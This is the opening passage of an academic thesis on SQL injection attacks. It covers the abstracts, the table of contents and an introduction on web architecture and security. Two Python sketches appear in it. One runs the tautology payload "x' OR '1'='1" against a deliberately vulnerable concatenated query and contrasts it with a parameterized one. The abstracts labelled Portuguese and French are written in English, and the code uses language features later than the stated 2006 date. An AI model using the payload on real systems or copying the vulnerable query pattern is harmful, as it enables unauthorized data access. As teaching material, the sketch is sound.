Hacking with SQL Injection Exposed - A Research Thesis

Apart from bibliographic citations, the contents presented herein, including graphical design,
were solely produced by Carlos Miguel Barreira Ferreira, the author.
Except where expressly stated otherwise, you are not permitted to copy, broadcast, download, store (in any
medium), transmit, show or play in public, adapt or change in any way the content of this thesis for any other
purpose whatsoever without the prior written permission of the author.
© 2006 Carlos Miguel Barreira Ferreira. All rights reserved.

in memory of my father and to Jesus, lover of my soul

ACKNOWLEDGEMENTS
My first word of gratitude goes, of course, to my closest family members. I thank my wife
Ana, my young daughter Sara, and my mother, for their loving care and enduring
patience.
I also thank my supervisor, Professor Pedro Isaías, for the time and effort he committed
to this endeavor, and for his priceless support whenever I needed someone to stand up
for me. His expertise, open mind and insight were invaluable assets in the development
of this research thesis.
My final word of appreciation goes to those friends and professionals who took the time
to review this document. My gratitude to:
• Andreas Goldschimdt, Project Manager at Hewlett-Packard EMEA
• Ângela Martins, HR Partner at Microsoft
• Pedro Machado, Consultant at UNISYS
• Shaun Leisegang, Technical Specialist at SourceCode EMEA

ABSTRACT
Nowadays, information constitutes an organization’s most valuable asset, and attacks on it
could threaten the organization’s integrity, availability and confidentiality. Despite the fact
that organizations have committed plenty of resources to security, code injection attacks, where
a remote attacker attempts to fool a software system into executing some carefully crafted attack
code and thereby gain control of the system, have become commonplace in recent years. SQL
Injection is an emerging code injection technique that specifically targets the underlying relational
database management system of an e-Business platform via its frontend, which typically is, but is by
no means restricted to, a Web page. It literally bypasses all security barriers, shattering the
corporate investments in IT security. Even though such harm can be inflicted, it seems that only
minimal resources are invested in developing security standards and built-in security measures in
Web applications, as the SQL Injection topic is still poorly studied.
Using a combination of action research and literature review, this research proposes the first
unifying definition of SQL Injection and the first taxonomy of attacks. This taxonomy is then used
as a basis for experimenting on a real e-Business platform in order to answer the research
question, which asks whether «the weakness of modern e-Business systems can be demonstrated by
proving SQL Injection techniques to be effective in obtaining and altering private business data».
This work demonstrates that SQL Injection is indeed an effective means to illicitly access and
manipulate private business data. It also demonstrates that even though some countermeasures
exist, a comprehensive solution is still far off. Finally, this work establishes that if an
effective solution is ever to be found, it must unify technology, people, processes, and policies,
while accounting for the business problems and challenges organizations are faced with. For the
time being, principles are the best means of addressing the SQL Injection threat in a holistic
fashion. Though this work is all about exposing and not actually preventing, a compilation of
useful principles has been included.

RESUMO
Information is today the most valuable asset in organizations. Attacks aimed specifically at
information put the integrity, availability and confidentiality of organizations at risk.
Although organizations have historically devoted considerable resources to security, code
injection attacks, in which a remote attacker attempts to manipulate an information system into
executing malicious code, have become increasingly common over recent years. SQL Injection is an
emerging code injection technique that targets the database management system of business support
applications, with the attack carried out through the user interface, which today is typically a
Web page. This technique literally allows existing security barriers to be bypassed, undermining
the investments already made in security. Although so much damage can be inflicted, it would seem
that only minimal resources have been devoted to developing standards and baseline measures for
Web applications, as the topic of SQL Injection is still very little studied.
Based on a combination of action research and literature review, this research work proposes the
first unifying definition of SQL Injection and the first taxonomy of attacks. This taxonomy is
then used in the experimental validation of the research question, which asks whether «through
SQL Injection it is possible to demonstrate the vulnerability of e-Business systems by obtaining
and altering private business data».
This work demonstrates that SQL Injection is indeed an effective technique for illicitly
obtaining and altering private business data. It also demonstrates that although some preventive
measures exist, a global solution is still far off, and it has become clear that if such a
comprehensive solution is ever formulated, it will have to take into account technological,
human, process and procedural aspects. At present, resorting to principles appears to be the best
means of combining all these factors. Accordingly, a compilation of principles that help mitigate
the SQL Injection threat has been included.

ABSTRAIT
Nowadays, information is the most valuable asset in an organization. Attacks aimed exclusively at
this information may endanger the organization’s integrity, availability and confidentiality.
Although organizations have long defended themselves with considerable security resources, code
injection attacks, in which a remote attacker attempts to manipulate an information system into
executing malicious code, have become increasingly frequent in recent years. SQL Injection is an
emerging code injection technique that targets the database management system of business support
applications, with the attack carried out through the user interface, which today may be a Web
page. This technique makes it possible to get past security barriers, defeating the investments
already made in security. Despite the extent of the damage that can be inflicted, only scant
resources have been devoted to developing standards and baseline measures for Web applications,
since the topic of SQL Injection is still very little studied.
Based on a combination of action research and a literature review, this research work sets out,
for the first time, to define SQL Injection in a unifying way and to present the first taxonomy
of attacks. This taxonomy supports the experimental validation of the research question, which
asks whether «through SQL Injection it is possible to demonstrate the vulnerability of e-Business
systems by obtaining and modifying private business data».
This research proves that SQL Injection is indeed an effective technique for illicitly obtaining
and modifying private business data. It also affirms that, although some preventive measures
exist, a deterministic solution is still a long way off. It supports the view that, if such an
all-encompassing solution were to be formulated, it would have to take into account
technological, human, process and behavioural aspects. At present, resorting to principles seems
to be the best way of bringing all these elements together. For this reason, a compilation of
principles that help mitigate the SQL Injection threat is included in this work.

CONTENTS
Contents
  List of Figures
  List of Tables
Introduction
  Background
    Webbed Organizations
    About Security
    Introducing Web Applications
    SQL Injection – The Research Topic
    About SQL Injection
    Simple Conceptual Example
  About This Research
    The Problem and Challenges
    The Research Question
    Purpose and Goals
    Scope
    Motivation
    Document Outline
Literature Review
  Research Strategy
  Findings
    Definition of SQL Injection
    RDBMS and SQL
    Relational Database Management Systems – RDBMS
    Data Definition Language – DDL
    Data Manipulating Language – DML
    Data Control Language – DCL
    Security in Databases
    World Wide Web
    Systems Architectures
    Security in Applications on the Wild Wild Web
  Critical Analysis
    Lessons Learned
    Direct Implications
    Refutation of Arguments
    Paramount Topics Surrounding SQL-Injection
    Additional Research
    Projects In This Area
  Conclusions
Methodology
  Research Strategy
  Findings
    Research Philosophies
    Positivism
    Critical Realism
    Interpretivism
    Research Approaches
    Deduction
    Induction
    Research Strategies
    Experimentation
    Surveys
    Case-Study
    Grounded-Theory
    Ethnography
    Action Research
    Temporal Horizons
    Multiple Methods: Triangulation
  Critical Analysis
    Lessons Learned
    Refutation of Research Approaches
    Direct Implications
  Research Methods
Attack Taxonomy
  Survey of Techniques
    Setting the Objective
    Choosing the Method
    Data Manipulation
    Authentication Bypass
    Information Retrieval
    Information Manipulation
    Information Fabrication
    Information Deletion
    Extending to Other Data Sources with OleDb
    Extending Beyond the RDBMS by Using Command Execution
    Uploading Files
    Examining Prerequisites
    Subqueries
    JOIN
    UNION
    Multiple Statements
    Comments
    Error Messages
    Implicit Type Casting
    Variable Morphism
    Stored Procedures
    String Concatenation for Building Dynamic SQL
    INTO
    Weak Policies and Principles
    Poking for Vulnerabilities
    Unvalidated Input
    Error Message Feedback
    Time Delays
    Uncontrolled Variable Size
    Type Casting & Variable Morphism
    Single Quotation Marks in Building Dynamic Queries
    Discovering Database Objects
    Offline Research
    Choosing Means
    Web Form Manipulation
    URL Header Manipulation
    HTTP Header Manipulation
    Cookie Poisoning
    Designing the Query
  Toward The Taxonomy
    Unifying Definition for SQL Injection
    Taxonomy Formulation
Experimenting
  Real Environment Test
Defensive Tactics
  Technology-Based
  Principle-Based
Conclusions
    Introduction
    Discussion of Results
    Contributions of This Work
    Implications
    Limitations of This Work
    Further Investigation
References
Glossary

LIST OF FIGURES
Figure 1 - The Evolution of Business
Figure 2 - The Evolution of Information Technology Architectures
Figure 3 - The Evolution of the Internet
Figure 4 - Breakdown of CVE security vulnerabilities found in 2003 and 2004
Figure 5 - The Seven Layers of the OSI Model
Figure 6 - Typical Web Infrastructure Layout
Figure 7 - The Spaghetti IT Architecture
Figure 8 - Classic Three-Tier Web Architecture Model
Figure 9 - Use of Textual Representation in an Application
Figure 10 - Summary of the Causing Factors of SQL Injection
Figure 11 - The Literature Review Process
Figure 12 - Literature Sources Available
Figure 13 - Worldwide RDBMS Market Share in 2002
Figure 14 - Worldwide RDBMS Market Share in 2003 Excluding Mainframes
Figure 15 - Simple Relational Data Structure
Figure 16 - Overriding Table Permissions on MS SQL Server 2005
Figure 17 - No Application Is An Island
Figure 18 - Bridging the Gap Between Business and IT
Figure 19 - The Evolution to Services
Figure 20 - Gartner Web Services Magic Quadrant
Figure 21 - Web Services Enabled Service-Oriented Architecture
Figure 22 - The Four Points of Authentication of a Database-Enabled Remote Web Request
Figure 23 - Authentication Methods in IIS 6.0
Figure 24 - User vs. Account Impersonation on a Web Application
Figure 25 - The Research Process “Onion”
Figure 26 - Microsoft’s Endorsement of Windows Authentication
Figure 27 - Corporate Messaging Software, IB Market Share, 2005
Figure 28 - Primary Key Information Exchanged via URL Querystring
Figure 29 - Sniffing SQL Statements Processed by the RDBMS in Real-Time
Figure 30 - Typical Activity Log of a Web Server
Figure 31 - Taxonomy of SQL Injection Attacks
Figure 32 - Public Page Used for Proof of Concept
Figure 33 - Probing for Possible Injection Entrypoints Via a Web Page
Figure 34 - Error Message Raised by a Successful SQL Injection Attack
Figure 35 - List of Local Files Obtained via an Error Raised by a Successful SQL Injection Attack
Figure 36 - SQL Injection Attack Prevented by the Microsoft ASP .NET Framework
Figure 37 - Exploitation Prevented by the “Secure by Default” Principle on MS SQL Server 2005
Figure 38 - The Concept of a Trust Boundary and Chokepoints
Figure 39 - The Knowledge Creation Cycle
Figure 40 - The Height of People, Processes, Policies and Technology in SQL Injection

LIST OF TABLES
Table 1 - System Stored Procedures in MS SQL Server 2005........................................................................................76
Table 2 - Handy Extended Stored Procedures in MS SQL Server 2000...................................................................... 142
Table 3 - Explicit and Implicit Type Conversions in MS SQL Server 2005 .................................................................. 149
Table 4 - Common HTTP Server Variables.................................................................................................................. 172
Table 5 - Taxonomy of SQL Injection Attacks............................................................................................................. 185

Hacking with SQL Injection Exposed
Chapter 1
INTRODUCTION
Every Web Application using a relational database can
theoretically be subject to SQL Injection attacks. This
research aims to develop the first consolidated taxonomy
of attacks by gathering data from a variety of academic,
professional and underground sources, thus providing
the means for follow-up studies in preventing these
types of attacks.
This chapter's goal is to present what this research is about and introduce the
research topic to the reader by providing an overview of the facts that led to the
formulation of the research question and what has already been done in that
field. Later in the chapter, an outline of this work will be presented, as well as
the author's view of its relevance and the motivation for carrying it out.

introduction •
BACKGROUND
According to Livshits & Lam (2005), the security of Web applications has become more
and more important over the last decade as Web-based enterprise applications have
increasingly come to manage sensitive information such as financial or medical data.
Within the Information Society context, if such data gets compromised, losses to
organizations could amount to millions, not counting intangible losses, e.g. loss of
reputation, which typically take the biggest toll and tend to take longer to dissipate. As a
result, Web applications are becoming more secure due to the growing awareness of
attacks. However, in large and complex applications, a single oversight can result in the
compromise of the entire system (Cerrudo 2002). Despite the fact that organizations
have committed plenty of resources to security, code injection attacks, where a remote
attacker attempts to fool a software system into executing some carefully crafted attack
code and thereby gain control of the system, have become commonplace in recent years
(Linn et al. 2004). SQL Injection is an emerging code injection attack that specifically targets
the relational database management system powering an e-Business platform
via its frontend, which is typically, but by no means exclusively, a Web page. It effectively
bypasses conventional security barriers, undermining corporate investments in IT security. Even
though such harm can be inflicted, it seems that only minimal resources are invested in
developing security standards and built-in security measures in Web applications
(Landsmann & Strömberg 2003; Viega & Messi 2004), as the topic has so far been poorly
studied.
But the status quo can be looked upon as the result of a combined set of causes of
different natures, such as organizational, technological and methodological factors.
Therefore, it is essential to characterize these three factors in order to portray the reality
surrounding the research topic. Each is addressed in turn in the following topics.

Webbed Organizations
Throughout the years organizations have striven to reduce costs and leverage the use of
the existing technology assets at their disposal while seeking to improve customer service,
increase competitiveness, and be more responsive to the strategic priorities of the business
(Endrei et al. 2004). While it is true that these challenges arose long before Information
Technology (IT), essentially as a direct consequence of an open market, they were
deepened by the advent of Information Technology and the Knowledge Society. As a
result, IT executives are constantly struggling to enhance the ability and scope of
corporate communication, allowing more efficient information exchange within their
own organizations as well as between partners in their value chains (Landsmann &
Strömberg 2003).
Two underlying principles exist behind these pressures: Heterogeneity and Change.
Heterogeneity because at any point in time mature organizations are the sum of legacy
systems, applications, architectures, processes (and people) of different vendors and eras.
As to Change, Globalization and the e-Business paradigm have tremendously accelerated
its pace over the past decade or so. According to Mark Endrei et al. (2004), Globalization
leads to fierce competition, which in turn leads to shorter product development lifecycles.
Empowered by rich and easily accessible product information, customers tend to change
requirements rapidly hence feeding an ever-accelerating loop of competitive
improvements in products and services. Whilst some organizations have succumbed to
the pressure imposed by the open competition market, the winning formula appears to
be a combination of agility and flexibility.
As a result, organizations have been evolving, and almost all of a sudden
restructuring became a buzzword associated with dynamic, forward-looking organizations.
From the highly hierarchical organizations preceding the 80’s, where business divisions were
vertical, isolated and segmented into departments, organizations evolved to a more
horizontal business-process-centric layout during the 90’s, and then toward the new business
ecosystem paradigm where the borders across departments became blurred. This
paradigm shift is depicted in the following diagram:
Figure 1 - The Evolution of Business
> adapted from (Endrei et al. 2004) <
But if this is what has been happening to organizations, where does that leave the
corporate IT environment? Business processes no longer respect the sacred, yet
invisible, line separating business units, as they must all now cooperate in a mesh of
interactions and players. The mesh itself keeps getting redefined according to the
requirements of the business, yet classic business challenges such as cost reduction
suggest that agility and flexibility come at a high price. Race (2003) indicates
in her report that the base IT challenges organizations are faced with remain essentially
the same. She points out the following challenges as the most relevant:
• Business processes are, by definition, hard to amend;
• Integrating different systems is not scalable;
• Failure to reuse common functional modules represents financial losses
and reduces interoperability;
• Although there are emerging technologies to address these issues, these are
still immature and troubled by the lack of standards.
Moreover, the evolution of the Internet has laid a foundation for the development and
usage of new categories of Information Technology systems operating on the Web
(Landsmann & Strömberg 2003). While the Web presents itself as a major business driver
promoting research and development of new technologies and standards, and
consequently taking systems architectures one step further, the danger of leaving old
problems behind stands tall.
Figure 2 - The Evolution of Information Technology Architectures
> stages shown: Structured, Monoliths, Client/Server, 3-Tier, N-Tier, Distributed Objects, Components, Services <
By the time client-server architectures began to be widely used, unstructured data
management, such as the file system, was already mature and looked upon as a
commodity. But the whole purpose of client-server was to serve and consume structured
data. This led to the appearance and improvement of new and more sophisticated
relational database management systems (RDBMS)¹ especially designed for operating
within a networked environment². But data structuring is just part of the justification for
the prominent role of the RDBMS. According to eXtropia (2006), these systems make it possible to
store, retrieve and modify data efficiently regardless of the amount of data being
manipulated. More importantly, databases have quickly become integral to the design,
development, and services offered by organizations, and the foundation stone on
which their operational, tactical and strategic business model is based. Since the
time of client-server down to Service-Oriented Architectures (see Figure 2 above),
databases have matured and grown in scope within organizations.
¹ According to its role, whether operational or analytical, a database can be referred to as OLTP or OLAP respectively.
Although the research topic cuts across database roles, the focus will be on OLTP databases.
And then the Web came. Informational websites, e-Commerce websites, extranets,
intranets, data exchange, search engines, e-Business, and more, spread like wildfire.
Figure 3 - The Evolution of the Internet
> adapted from (Chakrabarti 2003) <
The World Wide Web, or Web for short, provides connectivity and online access to
information and services, anytime, anywhere around the globe. Corporations quickly
realized the potential of this new revenue stream, and steadily adopted Web
applications by connecting their systems to the Web. Halfond & Orso (2005b) describe
this reality by stating that database-driven Web applications have become widely
deployed on the Internet, and organizations use them to provide a broad range of
services to their customers. As a result, and according to Uzi Ben-Artzi Landsmann &
Donald Strömberg (2003), the business environment has progressively become
decentralized. Unlike earlier revolutions, where most of the action occurred within the
protected corporate network environment, and mostly because of the e-Business
paradigm, core business databases have increasingly been exposed to unrestricted
networks such as the Internet by means of various frontends and intricate
multilayer architectures. This led to an improvement in the architectures, causing
Service-Oriented Architectures (SOA) to emerge. SOA promotes a business view, as
opposed to a technology-centric understanding of the corporate IT environment, by
endorsing abstraction and standardization. Even though business people are gaining
more and more control, according to Race (2003) the top-level IT challenges
organizations are faced with remain basically the same. In other words, technology
does not solve business problems!
² There are others that fit this category, such as object-oriented databases, but they are out of scope for this work.
In summary, organizations had to keep pace with the demands imposed by a
fast-moving market, causing departmental boundaries to blur, and thus providing
the stage for the implementation of transversal business processes. IT became more
business-centric by means of abstraction and standardization as per the
Service-Oriented Architectures approach. The advent of the Web carried the sight of
new unexplored markets, and the promise of success within reach of those who
would move in first. Databases were the keystone providing the reliability the
business had always required and the necessary scalability for expansion into the
Web. But the pressure imposed by ferocious competition and the rush to conquer
a new vast market unfortunately kept old problems unsolved. Organizations have
grown in complexity and are no longer standing alone, but webbed on the Web.

About Security
The second factor behind the research topic is technical in nature, as it would be
impossible to address Hacking without referring to security and some of the technicalities
underlying it.
According to Dieter Gollmann (2006), computer security is the prevention and detection
of unauthorized actions performed by users of a computer system, encompassing three
key goals: integrity, confidentiality and availability, which can be ensured by three leading
mechanisms: authentication, encryption and access control³ (Blake 2003; Gollmann
2006). Integrity deals with the prevention of unauthorized modification of information.
Confidentiality deals with the prevention of unauthorized disclosure of information, and
availability with the prevention of unauthorized withholding of information or resources.
The primary assets used by an application can be divided into two groups: information
and equipment. Information refers to the data that is stored within the application and
provided to the end-user. Equipment refers to the hardware and software used to deliver
the application (Blake 2003). Although the above mentioned security key goals and
mechanisms are applicable to both information and equipment, things get more serious
when the most treasured asset within an Information Society is threatened: Information
itself. The historical prevalence of buffer overflow attacks as an intrusion mechanism
(Boyd & Keromytis 2004; Landsmann & Strömberg 2003; Viega & Messi 2004) has
resulted in substantial research focused on the problem of detecting, preventing and
containing such attacks (Boyd & Keromytis 2004; Landsmann & Strömberg 2003).
Furthermore, according to Uzi Ben-Artzi Landsmann & Donald Strömberg (2003) and the
OWASP project (2006), corporations and security professionals have traditionally
committed most of their resources to networking and operating system security.
Therefore, attack methods aimed at these components have been known for some time
and standardized countermeasures have been put in place. On the other hand,
considerably less attention has been paid to attacks at the application level, such as
injection attacks like SQL Injection. According to the literature (Álvarez & Petrovic 2003; Boyd
& Keromytis 2004; Gaurav, Angelos, & Vassilis 2003; Huang et al. 2003; Kost
2003; Landsmann & Strömberg 2003; Linn et al. 2004; McDonald 2002; OWASP 2006; Xu,
Bhatkar, & Sekar 2005), Web masters and systems administrators around the globe have
been witnessing a rapid increase in the number of attacks on Web applications.
³ These and additional security services and mechanisms will be properly addressed in the Literature Review
chapter.
According to Xu, Bhatkar, & Sekar (2005), the breakdown of the common
vulnerabilities and exposures (CVE) in 2003 and 2004 is shown in the next chart:
Figure 4 - Breakdown of CVE security vulnerabilities found in 2003 and 2004
> adapted from (Xu, Bhatkar, & Sekar 2005) <
Design Errors 30%
Directory Traversal 4%
Format String 3%
URL encoding and related 1%
Command Injection 5%
Configuration 3%
Cross-site Scripting 5%
SQL Injection 2%
Other 5%
Memory Errors 22%
DoS 20%
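The shares listed for Figure 4 can be tallied with a few lines of Python. This is only an illustrative sketch: the variable names are hypothetical, and the grouping of Configuration and DoS as the infrastructure-related categories follows the reading of the chart given in this chapter rather than any classification published by Xu, Bhatkar, & Sekar.

```python
# Shares (in percent) as listed for Figure 4.
cve_shares = {
    "Design Errors": 30,
    "Directory Traversal": 4,
    "Format String": 3,
    "URL encoding and related": 1,
    "Command Injection": 5,
    "Configuration": 3,
    "Cross-site Scripting": 5,
    "SQL Injection": 2,
    "Other": 5,
    "Memory Errors": 22,
    "DoS": 20,
}

# Assumption taken from the chapter's discussion of the chart: only these two
# categories are treated as networking / operating system issues.
infrastructure_categories = {"Configuration", "DoS"}

total = sum(cve_shares.values())
infrastructure = sum(cve_shares[name] for name in infrastructure_categories)
application = total - infrastructure

print(f"total={total}% infrastructure={infrastructure}% application={application}%")
```

Under that grouping the tally gives 23% for infrastructure and 77% for application-related categories, out of a total of 100%.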

A quick review of the previous chart shows that only 23% of the security
vulnerabilities are related to networking and the operating system, as Configuration and
Denial of Service (DoS) are the only vulnerabilities fitting into this category. The
remaining 77% is related to application vulnerabilities in one way or another. Concentrating on
this set of threats, the chart corroborates that buffer overflows, counted here as memory errors, are
the most common intrusion mechanism. Unfortunately, as the chart represents a
snapshot of reality within a limited interval of time, it is not possible to corroborate
the growth of code injection attacks. One can only infer that the small percentage of
code injection attacks, and more precisely SQL Injection attacks, is due to their relatively recent
appearance on the hacking scene. So if there is a clear distinction between attacks aimed at
the infrastructure and those aimed at the application, let’s drill down a bit and introduce
the OSI model depicted in the following diagram:
Figure 5 - The Seven Layers of the OSI Model
> protocols shown: HTTP, HTTPS, FTP, Telnet, RPC, NetBIOS, TCP, UDP, SPX, IP, ICMP, SNMP, MAC Address, Ethernet, ATM <

The complexity and scope of the OSI model go well beyond the domain of this work
and therefore only its relevant parts will be described here. The OSI model
was developed by an ISO subcommittee and, being a framework, it does not target any
specific technology. What is important to retain from the diagram is the existence of a
layered model which defines a flow of interactions depending on the direction of the
communication. Although the OSI model is not tied to any particular technology, most of
the protocols shown in the diagram reflect the reality of today’s Web systems, which
depend on HTTP, which in turn runs over TCP and IP. According to Dawson et al. (2006), TCP is the de
facto standard transport protocol in today’s operating systems and is a very robust
protocol that adapts to various network characteristics, packet loss, link congestion, and
even significant differences in vendor implementations. As security awareness grew over
the years, new TCP/IP-based devices and protocols were developed in order to ensure the
previously mentioned prime goals of security. Network appliances now range from simple
network bridges to application-level firewalls and intrusion detection systems (IDS). Not
surprisingly, the evolution of such devices followed the OSI model, as attacks
seemed to follow the same pattern: the more sophisticated the attack, the higher its
target in the hierarchy of layers. So firewalls, the foremost class of devices protecting
the resources of one network from users of other networks, evolved into
application-level firewalls in the hope of stopping attacks happening at this level. But the
intelligence of such devices is limited. They can detect, for example, whether HTTP is being used
on a predefined port, as opposed to an unexpected telnet session that could potentially
mean that an attack is under way. But if the application protocol is in line with
what is expected, these devices are inadequate, even though a logical attack like SQL Injection
could be taking place (Halfond & Orso 2005a). Due to
this limitation, Intrusion Detection Systems were developed. They try to discover
behavioural patterns in order to determine whether an attack is indeed in progress, but IDSs are
only as smart as their knowledge database and are known to be prone to false positives.
Back to the chart in Figure 4 - Breakdown of CVE security vulnerabilities found in 2003
and 2004 on page 31, what makes applications so appetizing is the fact that ordinary
networking safeguards can be bypassed by carrying out a logical attack on the
application. These attacks try to fool the application into executing some carefully crafted
code on the hacker’s behalf using the application’s security context. The following
diagram depicts a common corporate architecture that offers a set of Web-based
applications that depend on corporate key systems.
Figure 6 - Typical Web Infrastructure Layout
> labels shown: Public Zone, Demilitarized Zone, Private Zone, http:80, sql:1433 <
Basically, most Web servers are separated from clients by firewalls (Landsmann &
Strömberg 2003); in this case two firewalls are used for providing two protected zones of
security. Remote users on the public zone, the Internet, perform legitimate requests to a
system sitting in the corporate demilitarized zone (DMZ). These requests can vary in
nature, but for the sake of simplicity let’s assume it is a standard Web request triggered
by a user using any standard Internet browser. The default rule of a firewall is to deny all
requests, thus forcing a declarative security model. In order to allow public requests to be
addressed by the proper system, the public firewall is configured to allow incoming
requests using the HTTP protocol (layer 7 of the OSI model) on its default port,
number 80. In turn, it is common for such systems on the DMZ to require access to
some corporate business systems sitting within the corporate private environment.
Probably the most typical scenario would be access to a relational database management
system. Using the same logic as before, the second firewall permits such requests coming
from a server on the DMZ depending on the expected incoming and outgoing protocol
types, requesting entity and destination system. So, for a hacker sitting in the public
zone, trying to use blocked ports to access other kinds of services is very difficult,
especially when firewalls have the ability to read protocols on layer 7. On the other
hand, if the remote user fools the application on the DMZ into performing illicit tasks on his
behalf, then from a network security point of view no attack appears to be in progress, while the
privileged security context of the application itself allows malicious code to be piggy-backed on
a legitimate request.
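The deny-by-default model described above can be sketched in a few lines of Python. The sketch is purely illustrative and makes several assumptions: the `Request` type, the zone names and the `ALLOW_RULES` table are hypothetical and only mirror the two rules labelled in Figure 6 (http:80 into the DMZ, sql:1433 into the private zone); no real firewall product is modelled.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    source_zone: str
    dest_zone: str
    protocol: str
    port: int
    payload: str


# Hypothetical allow-list; anything not listed is denied by default.
ALLOW_RULES = {
    ("public", "dmz", "http", 80),
    ("dmz", "private", "sql", 1433),
}


def firewall_allows(request: Request) -> bool:
    """Decide on zones, protocol and port only; the payload is never inspected."""
    key = (request.source_zone, request.dest_zone, request.protocol, request.port)
    return key in ALLOW_RULES


benign = Request("public", "dmz", "http", 80, "product=chair")
crafted = Request("public", "dmz", "http", 80, "product=chair' OR '1'='1")
direct = Request("public", "private", "sql", 1433, "SELECT 1")

for name, req in (("benign", benign), ("crafted", crafted), ("direct", direct)):
    print(name, "allowed" if firewall_allows(req) else "denied")
```

In this sketch the direct attempt to reach the database port from the public zone is denied, whereas the benign and the crafted Web requests are indistinguishable to the rule set, since both are well-formed HTTP requests on port 80.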
In summary, Web attacks, i.e. attacks exclusively using the HTTP/HTTPS protocol, are
rapidly becoming one of the fundamental threats for information systems
connected to the Internet (Álvarez & Petrovic 2003). Such attacks target databases
that are accessible through a Web frontend, and take advantage of flaws in the
input validation logic of Web components (Boyd & Keromytis 2004). This is so
because, although most Web servers are separated from clients by firewalls and
other security devices, Web applications offer
users legitimate channels through firewalls into corporate systems. When launched
from within the application logic, attacks are in general harder to detect and
protect against (Landsmann & Strömberg 2003;OWASP 2006;Spett 2002).
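A flaw in input validation of the kind mentioned above can be illustrated with a minimal, self-contained sketch. It uses Python and the in-memory SQLite engine from the standard library purely as stand-ins; they are assumptions of this example and not the Web platform or RDBMS studied in this work. The `products` table and the function names are hypothetical.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database with one hidden row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, price REAL, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [("chair", 25.0, 0), ("desk", 120.0, 0), ("prototype", 999.0, 1)],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # Flawed on purpose: the user input becomes part of the SQL text itself.
    sql = "SELECT name FROM products WHERE hidden = 0 AND name = '" + term + "'"
    return sorted(row[0] for row in conn.execute(sql))


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    # The input is bound as a value and is never parsed as SQL.
    sql = "SELECT name FROM products WHERE hidden = 0 AND name = ?"
    return sorted(row[0] for row in conn.execute(sql, (term,)))


conn = make_demo_db()
crafted = "x' OR '1'='1"

print(search_vulnerable(conn, "chair"))
print(search_vulnerable(conn, crafted))
print(search_parameterized(conn, crafted))
```

With the crafted input, the concatenated statement ends in `OR '1'='1'`, so the vulnerable search returns every row, including the hidden one, while the parameterized search treats the same input as an ordinary product name and returns nothing.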

Introducing Web Applications
Now that both organizational and technical factors surrounding the research topic have
been outlined, the remaining set of factors is methodological in nature. The OWASP
project (2006) states that any software application built on client-server technology that
operates on the Web and interacts with users or other systems using HTTP could be
classified as a Web application. These applications aim to provide users with connectivity and access
to online services and information. Spett (2002) indicates that they range from
simple to very complex, and each has a distinct purpose. OWASP (2006) goes into further
detail by stating that nowadays high-end Web applications encompass real-time sales and
inventory across multiple vendors, including Business-To-Business and
Business-To-Consumer, workflow and supply chain management, and legacy
applications.
In Information Technology, legacy applications and data are those that have been
inherited from languages, platforms, and techniques earlier than the current technology.
In the past, most programming targeted specific operating systems. A quick search on
Wikipedia (2006e) shows that in the IT industry, legacy is defined as «an antiquated
computer system or application program which continues to be used because the user
(typically an organization) does not want to replace or redesign it». These systems
are typically complex monoliths (see Figure 2 - The Evolution of Information Technology
Architectures on page 27), resulting in prohibitive redesign costs.
Furthermore, they tend to be highly available systems with nearly 100% uptime, with
little or no existing documentation on how the system operates, resulting in the inability
to expand and update it. On the other hand, since the .COM bubble burst another point
of view has arisen, which Wikipedia (2006e) states as «legacy systems are simply (and
only) computer systems that are both installed and working». So it all comes down
to the risk and cost of change, compared to the possible benefit resulting from the
replacement of such systems. Although the following picture is meant as a satire of
some intricate IT architecture drawn on a flipchart during an IT staff meeting, it could
very well represent a real scenario of an organization that has grown over time, but kept
its legacy systems operating.
Figure 7 - The Spaghetti IT Architecture
Managing such an architecture would definitely be a nightmare, no matter how good or
how many the professionals in charge of that burden are. The point of presenting this
scenario is that preventing a long-lived IT architecture from becoming an uncontrolled monster
requires a great deal of effort and discipline. But medium to large organizations simply
cannot get rid of core business systems at the same rate they become legacy. As
architectures evolve (see Figure 2 - The Evolution of Information Technology Architectures
on page 27), more and more abstraction layers are put on top of the previous ones, but one
cannot forget that at the very core, legacy systems and code are still present. Viega and
Messi (2004) cite an informational study based on security reviews of commercial code
where it was observed that C code (the de facto language used for coding some of the
oldest systems still running, such as the UNIX operating system) tends to have five to ten
times more vulnerabilities than Java code. Shankar et al., cited by Yao-Wen Huang et al.
(2004), detected insecure information flow within legacy code with little additional
annotation. According to Anh Nguyen-Tuong et al. (2004), it is tedious to review code
and look for vulnerabilities, and this can result in some vulnerabilities being overlooked. So
if in normal situations, where documentation and thorough knowledge of the code are
present, it is a difficult task to search and detect possible vulnerabilities, when it comes to
legacy, where by definition existing operating knowledge and documentation is scarce,
this could be an almost impossible task to achieve.
But more advanced systems, architectures and programming languages do not
necessarily mean a more hardened end-product. Viega and Messi (2004) state that
«although languages such as Java give programmers fewer chances to shoot themselves
in the foot than C does, there is still plenty of opportunity to take off some toes». In
addition to this, Web applications tend to have rapid development cycles (Huang et al.
2003). But the problems during development do not end with the stress imposed by
rapid development cycles. Developers and development teams can be awfully
inconsistent. The programmer who worked on Function A in Script A might have nothing
to do with Function B in Script A, so while one parameter in Script A might be
vulnerable, another might not (Spett 2002). Spett also claims that one can never be sure,
and therefore, everything should be tested. But this is exactly where another problem
begins. According to Anh Nguyen-Tuong et al. (2004), although security plays a critical
role in nearly all Web applications, only a small fraction can afford a detailed security
review. Because of this pressing need for speed and streamlining of the development
phase, the industry responded accordingly, and developers today have a vast set of rapid
Web development frameworks and technologies, including Sun's J2EE (Java Server Pages,
Servlets, Struts, etc.), Microsoft's ASP and ASP.NET, PHP, and the Common Gateway
Interface (CGI). All of these models make use of a tiered environment (Buehrer, Weide,
& Sivilotti 2005). But as stated earlier in this document, technology only facilitates. It
does not solve business problems. In other words, it is a big help to have the industry
backing professionals and organizations with more and more advanced technologies
and frameworks, but at the end of the day success will be dictated by the established
behaviours and methodologies.
Since the advent of the client-server architecture, applications have been modelled into different logical layers
and, subsequently, the supporting hardware infrastructure into tiers (Landsmann &
Strömberg 2003). Although there is some discussion around whether layers fit into
applications and tiers into infrastructure or vice-versa, the first option will be
preferred here since it is closer to the de facto naming conventions employed by the industry.
Understanding how the application is going to be deployed has a critical impact on its
